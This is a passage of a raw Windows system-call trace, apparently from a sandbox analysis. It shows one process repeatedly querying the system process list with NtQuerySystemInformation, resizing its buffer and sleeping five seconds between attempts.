RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.053] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.075] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 